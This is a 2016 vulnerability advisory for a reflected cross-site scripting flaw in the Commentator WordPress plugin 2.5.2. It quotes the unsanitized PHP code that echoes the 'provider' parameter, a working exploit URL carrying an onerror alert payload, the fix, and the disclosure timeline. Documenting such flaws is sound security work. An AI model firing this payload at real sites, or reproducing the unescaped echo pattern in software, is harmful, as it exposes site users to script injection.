WordPress Commentator plugin version 2.5.2 suffers from a cross site scripting vulnerability.
523e7fdeafa01597c47cd9c66c893c6ab2ef88aebc9fb1701358aaa160e507ba
#Product : Commentator WordPress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link :
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 13/Jan/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php
line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">
----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png
Fix:
Update to 2.5.3
Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016
Pub ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability